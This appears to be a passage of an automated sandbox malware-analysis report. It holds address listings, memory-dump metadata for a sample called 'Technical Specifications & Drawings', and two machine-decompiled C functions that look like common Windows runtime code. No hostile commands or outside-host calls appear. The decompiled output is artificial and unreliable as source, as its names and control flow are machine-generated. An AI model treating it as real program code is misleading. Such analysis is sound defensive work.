                                                  0x017d22d6
                                                  0x01815823
                                                  0x01815825
                                                  0x01815827
                                                  0x00000000
                                                  0x00000000
                                                  0x0181582d
                                                  0x00000000
                                                  0x0181582d
                                                  0x00000000
                                                  0x017d2228
                                                  0x017d2228
                                                  0x00000000
                                                  0x017d2228
                                                  0x017d2222
                                                  0x017d2214
                                                  0x017d2214
                                                  0x00000000
                                                  0x017d2114
                                                  0x017d2114
                                                  0x017d2114
                                                  0x017d211a
                                                  0x017d211c
                                                  0x017d2348
                                                  0x017d234d
                                                  0x01815840
                                                  0x01815845
                                                  0x01815848
                                                  0x0181584e
                                                  0x0181584e
                                                  0x01815848
                                                  0x017d2353
                                                  0x017d2355
                                                  0x017d2388
                                                  0x017d2388
                                                  0x017d2368
                                                  0x017d236a
                                                  0x017d236c
                                                  0x017d238f
                                                  0x00000000
                                                  0x017d236e
                                                  0x017d236e
                                                  0x017d218e
                                                  0x017d218e
                                                  0x017d2191
                                                  0x017d2195
                                                  0x01815a03
                                                  0x01815a06
                                                  0x01815a0c
                                                  0x01815a0f
                                                  0x01815a11
                                                  0x01815a13
                                                  0x01815a13
                                                  0x01815a19
                                                  0x01815a1f
                                                  0x00000000
                                                  0x017d219b
                                                  0x017d219b
                                                  0x017d21a0
                                                  0x017d2282
                                                  0x017d2284
                                                  0x017d2284
                                                  0x017d2284
                                                  0x017d2284
                                                  0x017d21a6
                                                  0x017d21a9
                                                  0x017d21ac
                                                  0x017d21ae
                                                  0x017d21b3
                                                  0x017d228b
                                                  0x017d2290
                                                  0x017d2379
                                                  0x017d2296
                                                  0x017d2298
                                                  0x017d2298
                                                  0x017d2290
                                                  0x017d21b9
                                                  0x017d21be
                                                  0x017d22a2
                                                  0x017d22a2
                                                  0x017d21c4
                                                  0x017d21c8
                                                  0x017d21cc
                                                  0x017d21d0
                                                  0x017d21d4
                                                  0x017d21de
                                                  0x017d21e3
                                                  0x01815a29
                                                  0x01815a2c
                                                  0x00000000
                                                  0x00000000
                                                  0x01815a3b
                                                  0x00000000
                                                  0x017d21e9
                                                  0x017d21e9
                                                  0x017d21e9
                                                  0x017d21ee
                                                  0x017d21f1
                                                  0x01815a45
                                                  0x01815a4b
                                                  0x01815a52
                                                  0x01815a58
                                                  0x01815a5d
                                                  0x01815a5f
                                                  0x01815a71
                                                  0x01815a61
                                                  0x01815a6a
                                                  0x01815a6a
                                                  0x01815a76
                                                  0x01815a79
                                                  0x01815a7f
                                                  0x01815a83
                                                  0x01815a85
                                                  0x01815a87
                                                  0x01815a87
                                                  0x01815a8c
                                                  0x01815a91
                                                  0x01815a97
                                                  0x01815a9f
                                                  0x01815aa0
                                                  0x01815aa1
                                                  0x01815aa6
                                                  0x01815aab
                                                  0x01815ab1
                                                  0x01815ab3
                                                  0x01815ab9
                                                  0x01815aca
                                                  0x01815ad4
                                                  0x01815ad4
                                                  0x01815ade
                                                  0x01815ade
                                                  0x01815aab
                                                  0x01815a79
                                                  0x01815a52
                                                  0x017d21f7
                                                  0x017d21f9
                                                  0x017d21fe
                                                  0x017d21fe
                                                  0x017d21e3
                                                  0x017d2195
                                                  0x017d236c
                                                  0x017d2122
                                                  0x017d2122
                                                  0x017d2124
                                                  0x017d2231
                                                  0x017d2236
                                                  0x017d2236
                                                  0x017d2238
                                                  0x017d2238
                                                  0x017d2240
                                                  0x017d2242
                                                  0x017d2244
                                                  0x018159fc
                                                  0x017d218c
                                                  0x017d218c
                                                  0x00000000
                                                  0x017d218c
                                                  0x017d224a
                                                  0x017d224f
                                                  0x017d2256
                                                  0x017d2304
                                                  0x017d2309
                                                  0x017d230f
                                                  0x017d231e
                                                  0x017d231e
                                                  0x017d231e
                                                  0x017d2320
                                                  0x017d2325
                                                  0x017d232a
                                                  0x017d232c
                                                  0x017d233e
                                                  0x017d233e
                                                  0x00000000
                                                  0x017d232c
                                                  0x017d2311
                                                  0x017d2317
                                                  0x017d231a
                                                  0x017d231c
                                                  0x017d2380
                                                  0x017d2380
                                                  0x017d2380
                                                  0x017d2384
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2386
                                                  0x00000000
                                                  0x017d231c
                                                  0x017d225c
                                                  0x017d225c
                                                  0x00000000
                                                  0x017d225c
                                                  0x017d212a
                                                  0x017d2134
                                                  0x017d2138
                                                  0x017d213d
                                                  0x01815858
                                                  0x01815863
                                                  0x01815863
                                                  0x01815867
                                                  0x0181586a
                                                  0x00000000
                                                  0x00000000
                                                  0x0181586c
                                                  0x0181586c
                                                  0x01815871
                                                  0x01815875
                                                  0x01815877
                                                  0x01815997
                                                  0x0181599c
                                                  0x018159a1
                                                  0x018159a7
                                                  0x018159a7
                                                  0x00000000
                                                  0x018159a7
                                                  0x0181587d
                                                  0x00000000
                                                  0x0181588b
                                                  0x0181588b
                                                  0x01815890
                                                  0x01815892
                                                  0x01815894
                                                  0x01815899
                                                  0x0181589b
                                                  0x018158a0
                                                  0x018158a0
                                                  0x018158aa
                                                  0x018158b2
                                                  0x018158b6
                                                  0x018158be
                                                  0x018158c6
                                                  0x018158c9
                                                  0x0181590d
                                                  0x01815917
                                                  0x0181591a
                                                  0x0181591c
                                                  0x01815920
                                                  0x01815928
                                                  0x0181592a
                                                  0x0181592c
                                                  0x0181592e
                                                  0x0181592e
                                                  0x018158cb
                                                  0x018158cd
                                                  0x018158d8
                                                  0x018158e0
                                                  0x018158f4
                                                  0x018158fe
                                                  0x018158fe
                                                  0x0181593a
                                                  0x0181593e
                                                  0x01815940
                                                  0x01815942
                                                  0x00000000
                                                  0x01815944
                                                  0x01815944
                                                  0x01815949
                                                  0x0181594e
                                                  0x0181594e
                                                  0x01815953
                                                  0x0181595b
                                                  0x01815976
                                                  0x01815976
                                                  0x0181597a
                                                  0x0181597f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815981
                                                  0x01815981
                                                  0x01815981
                                                  0x01815983
                                                  0x01815988
                                                  0x0181598d
                                                  0x01815991
                                                  0x01815991
                                                  0x00000000
                                                  0x0181595d
                                                  0x0181595d
                                                  0x01815963
                                                  0x01815965
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815967
                                                  0x01815967
                                                  0x0181596b
                                                  0x0181596d
                                                  0x00000000
                                                  0x00000000
                                                  0x0181596f
                                                  0x01815971
                                                  0x01815971
                                                  0x01815974
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815974
                                                  0x00000000
                                                  0x01815967
                                                  0x0181595b
                                                  0x01815942
                                                  0x01815863
                                                  0x017d2143
                                                  0x017d2143
                                                  0x017d2149
                                                  0x017d214f
                                                  0x017d22f1
                                                  0x017d22f6
                                                  0x00000000
                                                  0x017d2173
                                                  0x017d2173
                                                  0x017d217d
                                                  0x017d2181
                                                  0x017d2186
                                                  0x018159ae
                                                  0x018159b2
                                                  0x018159b5
                                                  0x018159b7
                                                  0x018159ba
                                                  0x018159cd
                                                  0x018159d1
                                                  0x018159d5
                                                  0x018159d9
                                                  0x018159db
                                                  0x00000000
                                                  0x00000000
                                                  0x018159dd
                                                  0x018159dd
                                                  0x018159e1
                                                  0x018159e4
                                                  0x018159e7
                                                  0x018159ee
                                                  0x018159ee
                                                  0x018159f3
                                                  0x018159f3
                                                  0x00000000
                                                  0x017d2186
                                                  0x017d214f
                                                  0x017d2106
                                                  0x017d2266
                                                  0x017d20d8
                                                  0x017d20da
                                                  0x017d20e0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                  • Instruction ID: 305f2e8f2e04a554a39e42476f40381753d48e38528f32b2a3c36b49d5316ed2
                                                  • Opcode Fuzzy Hash: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                  • Instruction Fuzzy Hash: FFF1F2326083499FD726CF2CC84472ABBF6AFC6314F08855DE995CB246D735D942CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B849B Relevance: .3, Instructions: 290COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E017B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x187f9c0);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1897b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E017BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E017C2280( *[fs:0x30], 0x1898550);
						_t139 =  *0x1897b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E017DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E017BFFB0(_t193, _t235, 0x1898550);
								L5:
								return E017FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E017A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1897b9c; // 0x0
							_t235 = L017C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1897b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E017DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E017BFFB0(_t193, _t235, 0x1898550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L017C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L017C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1897b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1897b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E017E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1897b9c; // 0x0
									_t214 = L017C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E017E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1897b10 =  *0x1897b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1897b04 =  *0x1897b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L017C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L017C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1897b08 =  *0x1897b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E017E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E017EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L017C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E017DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L017C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E017E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                  0x017b849b
                                                  0x017b849b
                                                  0x017b849b
                                                  0x017b849b
                                                  0x017b849d
                                                  0x017b84a2
                                                  0x017b84a7
                                                  0x017b84b1
                                                  0x017b84d8
                                                  0x00000000
                                                  0x017b84b3
                                                  0x017b84c4
                                                  0x017b84c9
                                                  0x017b84cd
                                                  0x017b84cf
                                                  0x017b84cf
                                                  0x017b84d6
                                                  0x017b84e6
                                                  0x017b84e9
                                                  0x017b84ec
                                                  0x017b84ef
                                                  0x017b84f2
                                                  0x017b84f4
                                                  0x017b84fc
                                                  0x017b8501
                                                  0x017b8506
                                                  0x017b8509
                                                  0x017b86e0
                                                  0x017b86e5
                                                  0x017b86e8
                                                  0x017b86ed
                                                  0x017b86f0
                                                  0x017b86f2
                                                  0x01809afd
                                                  0x01809b02
                                                  0x017b84da
                                                  0x017b84df
                                                  0x017b84df
                                                  0x017b86fa
                                                  0x017b86fd
                                                  0x017b86fe
                                                  0x017b8701
                                                  0x017b8706
                                                  0x017b8709
                                                  0x017b870b
                                                  0x00000000
                                                  0x00000000
                                                  0x017b8711
                                                  0x017b8725
                                                  0x017b8727
                                                  0x017b872a
                                                  0x017b872c
                                                  0x01809af0
                                                  0x01809af5
                                                  0x017b8732
                                                  0x017b8732
                                                  0x017b8732
                                                  0x017b8735
                                                  0x017b8737
                                                  0x017b8515
                                                  0x017b8515
                                                  0x017b8518
                                                  0x017b851d
                                                  0x017b8523
                                                  0x017b8527
                                                  0x017b852b
                                                  0x017b8537
                                                  0x017b8539
                                                  0x017b853c
                                                  0x017b853e
                                                  0x017b868c
                                                  0x017b8691
                                                  0x017b8699
                                                  0x017b869b
                                                  0x017b8744
                                                  0x017b8748
                                                  0x017b86a1
                                                  0x017b86a1
                                                  0x017b86a1
                                                  0x017b86a4
                                                  0x017b86a8
                                                  0x01809bdf
                                                  0x01809bdf
                                                  0x017b86ae
                                                  0x017b86b0
                                                  0x00000000
                                                  0x017b86b6
                                                  0x00000000
                                                  0x01809be9
                                                  0x017b86b0
                                                  0x017b8544
                                                  0x017b854a
                                                  0x017b854d
                                                  0x017b8551
                                                  0x017b876e
                                                  0x017b8778
                                                  0x017b877b
                                                  0x017b8780
                                                  0x017b8557
                                                  0x017b8557
                                                  0x017b855d
                                                  0x017b855d
                                                  0x017b856b
                                                  0x017b856e
                                                  0x017b8570
                                                  0x017b8573
                                                  0x017b8576
                                                  0x017b8576
                                                  0x017b8579
                                                  0x017b857b
                                                  0x00000000
                                                  0x00000000
                                                  0x017b8581
                                                  0x017b85a0
                                                  0x017b85a2
                                                  0x017b85a5
                                                  0x017b85a7
                                                  0x01809b1b
                                                  0x01809b1b
                                                  0x017b862e
                                                  0x017b862e
                                                  0x017b8631
                                                  0x017b8631
                                                  0x017b8634
                                                  0x017b8636
                                                  0x017b8669
                                                  0x017b8669
                                                  0x017b866b
                                                  0x01809bbf
                                                  0x01809bc4
                                                  0x01809bc8
                                                  0x01809bce
                                                  0x01809bce
                                                  0x017b8671
                                                  0x017b8671
                                                  0x017b8674
                                                  0x017b8676
                                                  0x01809bae
                                                  0x01809bae
                                                  0x017b8676
                                                  0x017b867c
                                                  0x017b867e
                                                  0x017b8688
                                                  0x017b8688
                                                  0x00000000
                                                  0x017b867e
                                                  0x017b8638
                                                  0x017b8638
                                                  0x017b863b
                                                  0x017b863e
                                                  0x017b863f
                                                  0x017b8642
                                                  0x017b8645
                                                  0x017b8648
                                                  0x017b864d
                                                  0x01809b69
                                                  0x01809b6e
                                                  0x01809b7b
                                                  0x01809b81
                                                  0x01809b85
                                                  0x01809b89
                                                  0x01809ba7
                                                  0x01809b8b
                                                  0x01809b91
                                                  0x01809b9a
                                                  0x01809b9f
                                                  0x01809b9f
                                                  0x017b8788
                                                  0x017b878d
                                                  0x017b8763
                                                  0x017b8763
                                                  0x017b8766
                                                  0x00000000
                                                  0x017b8766
                                                  0x01809b70
                                                  0x00000000
                                                  0x01809b70
                                                  0x017b8656
                                                  0x017b865a
                                                  0x017b865c
                                                  0x017b8752
                                                  0x017b8756
                                                  0x00000000
                                                  0x00000000
                                                  0x017b875e
                                                  0x00000000
                                                  0x017b875e
                                                  0x017b8662
                                                  0x017b8662
                                                  0x017b8662
                                                  0x017b8666
                                                  0x00000000
                                                  0x017b8666
                                                  0x017b85b7
                                                  0x017b85b9
                                                  0x017b85bc
                                                  0x017b85bf
                                                  0x017b85cc
                                                  0x017b85d1
                                                  0x017b85d4
                                                  0x017b85db
                                                  0x017b85de
                                                  0x017b85e0
                                                  0x01809b5f
                                                  0x00000000
                                                  0x01809b5f
                                                  0x017b85e6
                                                  0x017b85ea
                                                  0x017b86c3
                                                  0x017b86c5
                                                  0x017b86c8
                                                  0x017b86ca
                                                  0x01809b16
                                                  0x00000000
                                                  0x01809b16
                                                  0x017b86d6
                                                  0x017b85f6
                                                  0x017b85f6
                                                  0x017b85f9
                                                  0x017b8602
                                                  0x017b8606
                                                  0x017b860a
                                                  0x017b860b
                                                  0x017b860e
                                                  0x017b8611
                                                  0x00000000
                                                  0x017b8611
                                                  0x017b85f3
                                                  0x00000000
                                                  0x017b85f3
                                                  0x017b8619
                                                  0x017b861e
                                                  0x017b861e
                                                  0x017b8621
                                                  0x017b8622
                                                  0x017b8623
                                                  0x017b8625
                                                  0x017b862c
                                                  0x00000000
                                                  0x017b873d
                                                  0x00000000
                                                  0x017b873d
                                                  0x017b8737
                                                  0x017b850f
                                                  0x017b8512
                                                  0x00000000
                                                  0x017b8512
                                                  0x00000000
                                                  0x017b84d6

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                  • Instruction ID: 2f4241686d310aef5af1e810deda654aa85fd0930daf801a36544a18a9b0648f
                                                  • Opcode Fuzzy Hash: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                  • Instruction Fuzzy Hash: 4EB13970E0020ADFDB25DF99C998BEDFBB9BF48308F144129E505AB24ADB70A945CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AC600 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E017AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x189d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E017B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E017EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1897b9c; // 0x0
					_t74 = L017C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E017E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L017C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E017EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E017E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
